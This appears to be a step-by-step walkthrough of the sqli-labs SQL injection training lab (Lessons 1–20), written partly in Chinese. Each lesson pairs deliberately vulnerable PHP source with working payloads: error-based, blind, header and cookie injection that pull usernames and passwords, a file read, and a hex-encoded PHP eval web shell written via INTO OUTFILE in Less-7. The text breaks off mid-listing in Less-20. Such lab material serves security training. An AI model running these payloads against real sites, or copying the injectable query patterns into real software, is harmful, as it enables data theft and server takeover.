Less - 01 GET - Error Based - Single Quotes String(报错显示 基于单引号)
<?php
// sqli-labs Less-1: the `id` query parameter is spliced into a single-quoted SQL literal
// with no escaping, so a `'` in `id` terminates the literal and the rest is parsed as SQL.
// Uses the legacy mysql_* extension (removed in PHP 7.0).
error_reporting(0); // PHP errors are hidden, but the DB error below is still printed
if(isset($_GET['id']))
{
$id=$_GET['id']; // untrusted input, used verbatim
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; // injection sink: string-built SQL, single-quote context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password']; // the stored password is echoed to the client
}else{
print_r(mysql_error()); // raw DB error text in the response: this is the error-based channel
}
}
http://sqli.test/Less-1/?id=1
http://sqli.test/Less-1/?id=1'and 1=1 -- # // 有数据
http://sqli.test/Less-1/?id=1'and 1=2 -- # // 无数据
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) -- # // XPATH syntax error: '^$root@localhost^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select database()),0x5e24),1)) -- # // XPATH syntax error: '^$security^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$emails^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x5e24),1)) -- # // XPATH syntax error: '^$referers^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x5e24),1)) -- # // XPATH syntax error: '^$uagents^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x5e24),1)) -- # // XPATH syntax error: '^$users^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$id^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x5e24),1)) -- # // XPATH syntax error: '^$username^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),0x5e24),1)) -- # // XPATH syntax error: '^$password^$'
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$id:1 username:Dumb password:Du' — the updatexml() error text is capped at 32 characters (the trailing ^$ is already cut off here), which is why longer values are paged with substr()
http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$umb^$'
id:1 username:Dumb password:Dumb
Less - 02 GET - Error Based - Integer Based (报错显示 数字型)
<?php
// sqli-labs Less-2: `id` is spliced into an unquoted numeric comparison, so no quote
// character is needed to inject; `1 and 1=2` is already valid SQL in this context.
error_reporting(0);
if(isset($_GET['id']))
{
$id=$_GET['id']; // untrusted input, used verbatim (no intval()/cast)
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; // injection sink: unquoted numeric context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password']; // the stored password is echoed to the client
}else{
print_r(mysql_error()); // raw DB error text in the response: the error-based channel
}
}
http://sqli.test/Less-2/?id=1 and 1=1 // 有数据
http://sqli.test/Less-2/?id=1 and 1=2 // 无数据
http://sqli.test/Less-2/?id=1 and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$id:1 username:Dumb password:Du'
http://sqli.test/Less-2/?id=1 and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$umb^$'
id:1 username:Dumb password:Dumb
Less - 03 GET - Error Based - Single Quotes With Twist String (报错显示 带括号的单引号)
<?php
// sqli-labs Less-3: `id` is spliced into ('$id') unescaped, so a payload has to close
// both the quote and the parenthesis (`')`) before the injected SQL.
error_reporting(0);
if(isset($_GET['id']))
{
$id=$_GET['id']; // untrusted input, used verbatim
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; // injection sink: quoted + parenthesised context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password']; // the stored password is echoed to the client
}else{
print_r(mysql_error()); // raw DB error text in the response: the error-based channel
}
}
http://sqli.test/Less-3/?id=1' )and 1=1 -- w // 有数据
http://sqli.test/Less-3/?id=1' )and 1=2 -- w // 无数据
http://sqli.test/Less-3/?id=1' ) and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$id:1 username:Dumb password:Du'
http://sqli.test/Less-3/?id=1' ) and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$umb^$'
id:1 username:Dumb password:Dumb
Less - 04 GET - Error Based - Double Quotes - String(报错显示 双引号)
<?php
// sqli-labs Less-4: `id` is wrapped in double quotes in PHP and then placed inside
// parentheses in the query, so the payload must close with `")`.
error_reporting(0);
if(isset($_GET['id']))
{
$id=$_GET['id']; // untrusted input
$id = '"' . $id . '"'; // quoting without escaping: a `"` inside $id still breaks out
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1"; // injection sink: double-quoted + parenthesised context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password']; // the stored password is echoed to the client
}else{
print_r(mysql_error()); // raw DB error text in the response: the error-based channel
}
}
http://sqli.test/Less-4/?id=1") and 1=1 -- + // 有数据
http://sqli.test/Less-4/?id=1") and 1=2 -- + // 无数据
http://sqli.test/Less-4/?id=1") and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- + // XPATH syntax error: '^$id:1 username:Dumb password:Du'
http://sqli.test/Less-4/?id=1") and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- + // XPATH syntax error: '^$umb^$'
id:1 username:Dumb password:Dumb
Less - 05 GET - Double Injection - Single Quotes - String(双注入 单引号)
<?php
// sqli-labs Less-5: same single-quoted sink as Less-1, but no row data is echoed.
// The response only reveals hit/miss and the raw DB error, so extraction has to go
// through the error text (e.g. updatexml()) or a blind technique.
error_reporting(0);
if(isset($_GET['id']))
{
$id=$_GET['id']; // untrusted input, used verbatim
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; // injection sink: single-quote context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........'; // fixed text: no column values are returned
}else{
print_r(mysql_error()); // raw DB error text in the response: the error-based channel
}
}
http://sqli.test/Less-5/?id=1' and 1=1 --+ // 有数据
http://sqli.test/Less-5/?id=1' and 1=2 --+ // 无数据
// 输出占位
http://sqli.test/Less-5/?id=1 ' order by 1,2,3 --+ // 有数据
http://sqli.test/Less-5/?id=1 ' order by 1,2,3,4 --+ // 报错
// 报错注入
http://sqli.test/Less-5/?id=1 ' union select 1,2,(updatexml(1,concat(0x7e,(select user()),0x7e),1)) --+ // user() returns the DB account (root@localhost in the Less-1 run above); the value `security` is what database() returns — this annotation and its query do not match
http://sqli.test/Less-5/?id=1' union select 1,2,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema= database() limit 0,1),0x7e),1)) --+ // emails
http://sqli.test/Less-5/?id=1' union select 1,2,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema= database() and table_name='users' limit 0,1),0x7e),1)) --+ // id
http://sqli.test/Less-5/?id=1' union select 1,2,(updatexml(1,concat(0x7e,(select concat(id,username,password) from security.users limit 0,1),0x7e),1)) --+ // 1DumbDumb
// 报错读文件
http://sqli.test/Less-5/?id=1 ' union select 1,2,(updatexml(1,concat(0x7e,(load_file('C:/phpstudy_pro/WWW/sqli/shell.php')),0x7e),1)) --+ // load_file() needs the MySQL FILE privilege and a secure_file_priv setting that permits the path; the returned text is still subject to the 32-character cap of the updatexml() error, so page through longer files with substr()
Less - 06 GET - Double Injection - Double Quotes - String (双注入 双引号)
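<?php
// sqli-labs Less-6: `id` is wrapped in double quotes and spliced into the query unescaped,
// so a `"` in `id` terminates the literal. The line as transcribed on this page
// (`... WHERE id="$id" ...` inside a double-quoted PHP string) does not parse; the quoting
// is done here the same way the Less-10 listing does it, which is what the `"` payloads
// below rely on. No row data is echoed: only hit/miss plus the raw DB error.
error_reporting(0);
if(isset($_GET['id']))
{
$id=$_GET['id']; // untrusted input
$id = '"' . $id . '"'; // quoting without escaping
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; // injection sink: double-quoted string context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........'; // fixed text: no column values are returned
}else{
print_r(mysql_error()); // raw DB error text in the response: the error-based channel
}
}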
// 测试
http://sqli.test/Less-6/?id=1 " and 1=1 --+
http://sqli.test/Less-6/?id=1 " and 1=2 --+
// 与上一个一样的报错注入过程
http://sqli.test/Less-6/?id=1" union select 1,2,(updatexml(1,concat(0x7e,(select concat(id,username,password) from security.users limit 0,1),0x7e),1)) --+ // 1DumbDumb  (path corrected: this is the Less-6 endpoint, the previous text said Less-5)
Less - 07 GET - Dump Into Outfile -String (文件导出)
<?php
// sqli-labs Less-7: `id` is spliced into (('$id')) unescaped, so the payload must close
// with `'))`. The DB error is replaced by a fixed message, so there is no error-based
// channel; the page only reveals hit/miss, and the lesson's goal is INTO OUTFILE.
error_reporting(0);
if(isset($_GET['id']))
{
$id=$_GET['id']; // untrusted input, used verbatim
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; // injection sink: quoted + double-parenthesised context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in.... Use outfile......';
}else{
echo 'You have an error in your SQL syntax'; // static text on any failure (no row or DB error alike)
//print_r(mysql_error());
}
}
// 测试
http://sqli.test/Less-7/?id=1 ')) and 1=1 --+
http://sqli.test/Less-7/?id=1 ')) and 1=2 --+
// 写shell
http://sqli.test/Less-7/?id=1 ')) union select 1,2,0x273c3f70687020406576616c28245f504f53545b3132335d293b3f3e27 into outfile 'C:/phpstudy_pro/WWW/sqli/Less-7/shell.php' --+ // the hex literal decodes to '<?php @eval($_POST[123]);?>' (a one-line web shell). INTO OUTFILE requires the MySQL FILE privilege, a secure_file_priv setting that allows the target directory, write access for the MySQL service account to the web root, and a path that does not already exist; because Less-7 replaces mysql_error() with a fixed string, a failed write gives no feedback — confirm by requesting shell.php afterwards
Less - 08 GET - Blind - Boolean Based - Single Quotes (布尔盲注 单引号)
<?php
// sqli-labs Less-8: single-quoted sink; nothing is printed on a miss or on a DB error,
// so the only signal is "You are in" vs. an empty page — a boolean oracle.
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id']; // untrusted input, used verbatim
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; // injection sink: single-quote context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........'; // true branch of the oracle
}
else{
// false branch: intentionally silent (no error text is leaked)
//echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
}
}
// 测试
http://sqli.test/Less-8/?id=1' and 1=1 --+
http://sqli.test/Less-8/?id=1' and 1=2 --+
// 盲注
http://sqli.test/Less-8/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+ // works, but Less-8 already gives a boolean oracle ("You are in" vs. an empty page), so the delay is unnecessary: `1' and ascii(substr(database(),1,1))=115 --+` is enough (115 is 's', the first letter of `security`)
Less - 09 GET - Blind - Time Based - Single Quotes(时间盲注 单引号)
<?php
// sqli-labs Less-9: same single-quoted sink as Less-8, but both branches print the
// same text, so no boolean signal remains; only a time-based oracle (sleep()) is observable.
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id']; // untrusted input, used verbatim
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; // injection sink: single-quote context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........';
}else{
echo 'You are in...........'; // identical output on miss/error: response content carries no signal
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
}
}
// 测试
http://sqli.test/Less-9/?id=1 ' and sleep(4) --+
// 延时盲注
http://sqli.test/Less-9/?id=1 ' and if(ascii(substr(database(),1,1))=115,sleep(4),1) --+
Less - 10 GET - Time Based - Double Quotes (时间盲注 双引号)
<?php
// sqli-labs Less-10: `id` is wrapped in double quotes (no parentheses), and both
// branches print the same text, so only a time-based oracle is observable and the
// payload must close the literal with `"`.
error_reporting(0);
if(isset($_GET['id']))
{
$id=$_GET['id']; // untrusted input
$id = '"'.$id.'"'; // quoting without escaping
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; // injection sink: double-quoted string context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo 'You are in...........';
}
else
{
echo 'You are in...........'; // identical output on miss/error: no boolean or error signal
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
}
}
// 测试
http://sqli.test/Less-10/?id=1" and sleep(3) --+
// 时间盲注
http://sqli.test/Less-10/?id=1" and if(ascii(substr(database(),1,1))=115,sleep(4),1) --+
Less - 11 POST - Error Based - Single Quotes - String (基于报错 单引号 字符型)
<?php
// sqli-labs Less-11: POST login form. Both uname and passwd are concatenated into
// single-quoted literals unescaped; the matched row (including the stored password)
// and any raw DB error are echoed back.
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname']; // untrusted
$passwd=$_POST['passwd']; // untrusted
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"; // injection sink in both fields; `@` only silences warnings from the assignment
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password']; // the stored password is echoed to the client
}else{
//echo "Try again looser";
print_r(mysql_error()); // raw DB error text in the response: the error-based channel
}
}
// 测试
[POST] uname=admin&passwd=admin'and+1=2%20--+&submit=Submit
// 报错注入
[POST] uname=admin&passwd=admin'and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)--+&submit=Submit
Less - 12 POST - Error Based - Double Quotes - String - with twist (基于报错 双引号 字符型 带括号)
<?php
// sqli-labs Less-12: POST login; both fields are wrapped in double quotes in PHP and
// placed inside parentheses in the query, so the payload must close with `")`.
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname']; // untrusted
$passwd=$_POST['passwd']; // untrusted
$uname='"'.$uname.'"'; // quoting without escaping
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1"; // injection sink: double-quoted + parenthesised context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password']; // the stored password is echoed to the client
}else{
print_r(mysql_error()); // raw DB error text in the response: the error-based channel
}
}
// 测试
[POST] uname=admin&passwd=admin")and+1=2+--+&submit=Submit
// 报错注入
[POST] uname=admin&passwd=admin")and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)+--+&submit=Submit
Less - 13 POST - Double Injection - Single Quotes - String - with twist(双注入 单引号 字符型 带括号)
<?php
// sqli-labs Less-13: POST login with ('$uname') / ('$passwd') contexts, so the payload
// must close with `')`. Nothing is printed on success; only the raw DB error is
// printed on failure, so extraction is error-based or blind (time-based).
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname']; // untrusted
$passwd=$_POST['passwd']; // untrusted
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1"; // injection sink: single-quoted + parenthesised context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
// success branch is silent: no column values are returned
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
}else{
print_r(mysql_error()); // raw DB error text in the response: the error-based channel
}
}
?>
// 测试
[POST] uname=admin&passwd=admin')and+sleep(3)%20--+&submit=Submit
// 时间盲注
[POST] uname=admin&passwd=admin')and+if(ascii(substr(database(),1,1))=115,sleep(4),1)%20--+&submit=Submit
// 报错注入
[POST] uname=admin&passwd=admin')and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)%20--+&submit=Submit
Less - 14 POST - Double Injection - Double Quotes - String - with twist (双注入 双引号 字符型 带括号)
<?php
// sqli-labs Less-14: POST login; both fields are wrapped in double quotes (no
// parentheses), so the payload closes with `"`. Success is silent; failure prints
// the raw DB error, so extraction is error-based or time-based.
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname']; // untrusted
$passwd=$_POST['passwd']; // untrusted
$uname='"'.$uname.'"'; // quoting without escaping
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1"; // injection sink: double-quoted string context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
// success branch is silent: no column values are returned
//echo 'Your Login name:'. $row['username'];
//echo 'Your Password:' .$row['password'];
}else{
print_r(mysql_error()); // raw DB error text in the response: the error-based channel
}
}
?>
// 测试
[POST] uname=admin&passwd=admin"+and+sleep(3)%20--+&submit=Submit
// 时间盲注
[POST] uname=admin&passwd=admin"+and+if(ascii(substr(database(),1,1))=115,sleep(4),1)%20--+&submit=Submit
// 报错注入
[POST] uname=admin&passwd=admin"+and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)%20--+&submit=Submit
Less - 15 POST - Blind - Boolean/Time Based - Single Quotes (布尔/时间盲注 单引号)
<?php
// sqli-labs Less-15: POST login with single-quoted literals. As listed, nothing is
// echoed in either branch (no row data, no DB error), so the only observable oracle
// in this listing is a time-based one (sleep()).
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname']; // untrusted
$passwd=$_POST['passwd']; // untrusted
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"; // injection sink: single-quote context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
// success branch is silent
//echo 'Your Login name:'. $row['username'];
//echo 'Your Password:' .$row['password'];
}else{
// failure branch is silent too: no error text is leaked
//print_r(mysql_error());
}
}
?>
// 测试
[POST] uname=admin&passwd=admin'+and+sleep(3)%20--+&submit=Submit
//时间盲注
[POST] uname=admin&passwd=admin'+and+if(ascii(substr(database(),1,1))=115,sleep(3),1)%20--+&submit=Submit
Less - 16 POST - Blind - Boolean/Time Based - Double Quotes ( 布尔/时间盲注 双引号)
<?php
// sqli-labs Less-16: POST login; both fields are wrapped in double quotes and placed
// inside parentheses, so the payload must close with `")`. As listed, nothing is
// echoed in either branch, so only a time-based oracle is observable here.
error_reporting(0);
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname']; // untrusted
$passwd=$_POST['passwd']; // untrusted
$uname='"'.$uname.'"'; // quoting without escaping
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1"; // injection sink: double-quoted + parenthesised context
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
// success branch is silent
//echo 'Your Login name:'. $row['username'];
//echo 'Your Password:' .$row['password'];
}else{
// failure branch is silent too: no error text is leaked
//echo "Try again looser";
//print_r(mysql_error());
}
}
?>
// 测试
[POST] uname=admin&passwd=admin+")+and+sleep(3)--+&submit=Submit
// 时间盲注
[POST] uname=admin&passwd=admin+")+and+if(ascii(substr(database(),1,1))=115,sleep(3),1)--+&submit=Submit
Less - 17 POST - Update Query - Error Based - String (Update注入 基于报错)
<?php
// sqli-labs Less-17: password-reset flow. uname is sanitised by check_input() and used in
// a SELECT; passwd is NOT sanitised and is spliced raw into the UPDATE further down.
error_reporting(0);
// Sanitiser applied to uname only: truncate, undo magic quotes, then either cast to
// int (all-digit input) or escape and wrap in single quotes (anything else).
function check_input($value){
if(!empty($value)){ // empty(): ""/"0"/null skip the truncation
$value = substr($value,0,15); // truncate to 15 bytes
}
if (get_magic_quotes_gpc()){ // undo magic_quotes escaping if it is on (function removed in PHP 8.0)
$value = stripslashes($value);
}if (!ctype_digit($value)){ // not all digits: escape and single-quote
$value = "'" . mysql_real_escape_string($value) . "'";
}else{
$value = intval($value); // all digits: cast to int
}
return $value;
}
if(isset($_POST['uname']) && isset($_POST['passwd'])){
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd']; // untrusted and unescaped
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; // $uname is already quoted/escaped by check_input()
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$row1 = $row['username'];
// Injection sink, reached only when uname names an existing user. A payload ending in
// `-- ` comments out the WHERE clause, so a payload that raises no error rewrites the
// password of every row.
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
if (mysql_error()){
print_r(mysql_error()); // raw DB error text in the response: the error-based channel
}else{
//echo " You password has been successfully updated " ;
}
//echo 'Your Password:' .$row['password'];
}
}
?>
// Audit: only uname goes through check_input(); passwd is used raw in the UPDATE statement, so passwd is the injection point. Two caveats: uname must match an existing user (e.g. dumb/Dumb) or the UPDATE branch is never reached, and the trailing `-- ` in the payload comments out `WHERE username='...'`, so any payload that does not raise a DB error overwrites the password of every user — stick to error-raising payloads against a lab you do not want to reset.
// 测试
[POST] uname=dumb&passwd=123'"+and+1=2%20--+&submit=Submit // 报错
// 报错注入
[POST] uname=dumb&passwd=123'+and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)%20--+&submit=Submit
[POST] uname=dumb&passwd=1'+and+(select+1+from+(select+count(*),concat((select(select+concat(CAST(concat(username,password)+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+&submit=Submit
update users set password = '1' and (select 1 from (select count(*),concat((select(select concat(CAST(concat(username,password) as char),0x7e)) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- ' WHERE username='Dumb'   ← the resulting statement; everything after `-- ` (the original WHERE clause) is a comment
update users set password = '1' and (
select 1 from (
select count(*),concat(
(select(select concat(CAST(concat(username,password) as char),0x7e)) from users limit 0,1)
,
floor(rand(0)*2)
)x
from information_schema.tables group by x
)a
)
Less - 18 POST - Header Injection - Uagent Field - Error Based (Header头注入 Uagent字段 基于报错)
<?php
// sqli-labs Less-18: the login fields are escaped, but after a successful login the raw
// User-Agent header is written into security.uagents with string-built SQL.
error_reporting(0);
// Sanitiser for the two POST fields: truncate, undo magic quotes, then cast to int
// (all-digit input) or escape and single-quote (anything else).
function check_input($value){
if(!empty($value)){
$value = substr($value,0,20); // truncate to 20 bytes
}if (get_magic_quotes_gpc()){ // undo magic_quotes escaping if it is on (function removed in PHP 8.0)
$value = stripslashes($value);
}if (!ctype_digit($value)){ // not all digits: escape and single-quote
$value = "'" . mysql_real_escape_string($value) . "'";
}else{
$value = intval($value); // all digits: cast to int
}
return $value;
}
$uagent = $_SERVER['HTTP_USER_AGENT']; // User-Agent request header: attacker-controlled, never escaped
$IP = $_SERVER['REMOTE_ADDR']; // peer address of the TCP connection, not a header (X-Forwarded-For is not consulted)
echo 'Your IP ADDRESS is: ' .$IP;
if(isset($_POST['uname']) && isset($_POST['passwd'])){
$uname = check_input($_POST['uname']); // both credentials go through check_input()
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
// Reached only with valid credentials. $uname is already quoted by check_input();
// $uagent and $IP are spliced in raw -> injection sink inside an INSERT.
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
echo 'Your User Agent is: ' .$uagent; // header value echoed into the page unescaped
print_r(mysql_error()); // raw DB error of the INSERT: the error-based channel
}else{
print_r(mysql_error());
}
}
?>
// Audit: after a successful login, the User-Agent header and the client IP are inserted into security.uagents without escaping. Only the User-Agent is attacker-controlled: REMOTE_ADDR comes from the TCP connection, not from a request header, so it is not injectable here. The INSERT runs only when uname/passwd match an existing user, so this injection requires valid credentials (e.g. Dumb/Dumb).
// 测试
[User-Agent] 'and 1=2 // 报错
// 报错注入
[User-Agent] 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1
Less - 19 POST - Header Injection - Referer Field - Error Based (Header头注入 Referer字段 基于报错)
<?php
// sqli-labs Less-19: same structure as Less-18, but the raw Referer header is the value
// written into security.referers after a successful login.
error_reporting(0);
// Sanitiser for the two POST fields: truncate, undo magic quotes, then cast to int
// (all-digit input) or escape and single-quote (anything else).
function check_input($value){
if(!empty($value)){
$value = substr($value,0,20); // truncate to 20 bytes
}if (get_magic_quotes_gpc()){ // undo magic_quotes escaping if it is on (function removed in PHP 8.0)
$value = stripslashes($value);
}if (!ctype_digit($value)){ // not all digits: escape and single-quote
$value = "'" . mysql_real_escape_string($value) . "'";
}else{
$value = intval($value); // all digits: cast to int
}
return $value;
}
$uagent = $_SERVER['HTTP_REFERER']; // misnamed: this is the Referer header (attacker-controlled, never escaped)
$IP = $_SERVER['REMOTE_ADDR']; // peer address of the TCP connection, not a header
if(isset($_POST['uname']) && isset($_POST['passwd'])){
$uname = check_input($_POST['uname']); // both credentials go through check_input()
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
// Reached only with valid credentials; the Referer is spliced in raw -> injection sink inside an INSERT.
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
echo 'Your Referer is: ' .$uagent; // header value echoed into the page unescaped
mysql_query($insert);
print_r(mysql_error()); // raw DB error of the INSERT: the error-based channel
}else{
print_r(mysql_error());
}
}
?>
// 测试
[referer] 'and 1=2 // 报错
// 报错注入
[referer] 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1
Less - 20 POST - Cookie Injections - Uagent Field - Error Based (Cookie注入 Uagent字段 基于报错)
<?php
// sqli-labs Less-20: after a successful POST login the username is stored in a `uname`
// cookie; on later requests that cookie value is spliced into a SELECT unescaped, so the
// cookie (not the login form) is the injection point.
error_reporting(0);
if (!isset($_COOKIE['uname'])) {
// Declared only on the no-cookie path (conditional function definition).
// Sanitiser for the two POST fields: truncate, undo magic quotes, then cast to int
// (all-digit input) or escape and single-quote (anything else).
function check_input($value)
{
if (!empty($value)) {
$value = substr($value, 0, 20); // truncation (see comments)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled (function removed in PHP 8.0)
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote if not a number
{
$value = "'" . mysql_real_escape_string($value) . "'";
} else {
$value = intval($value);
}
return $value;
}
if (isset($_POST['uname']) && isset($_POST['passwd'])) {
$uname = check_input($_POST['uname']); // both login fields are escaped here
$passwd = check_input($_POST['passwd']);
$sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username']; // read before the $row1 check; on a failed login $row1 is false and this is null
if ($row1) {
setcookie('uname', $cookee, time() + 3600); // plain cookie: no HttpOnly/Secure flags are set
header('Location: index.php');
echo "I LOVE YOU COOKIES";
print_r(mysql_error());
} else {
print_r(mysql_error());
}
}
} else {
if (!isset($_POST['submit'])) {
$cookee = $_COOKIE['uname']; // untrusted: entirely under the client's control
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : " . $_SERVER['HTTP_USER_AGENT']; // request header echoed into HTML unescaped
echo "YOUR IP ADDRESS IS : " . $_SERVER['REMOTE_ADDR'];
echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp); // cookie value echoed into HTML unescaped
$sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1"; // injection sink: raw cookie value in a single-quoted literal
$result = mysql_query($sql);
if (!$result) {
die('Issue with your mysql: ' . mysql_error()); // raw DB error in the response: the error-based channel
}
$row = mysql_fetch_array($result);
if ($row) {
echo 'Your Login name:' . $row['username'];
echo 'Your Password:' . $row['password']; // the stored password is echoed to the client
echo 'Your ID:' . $row['id'];
} else {
}
echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';
} else {
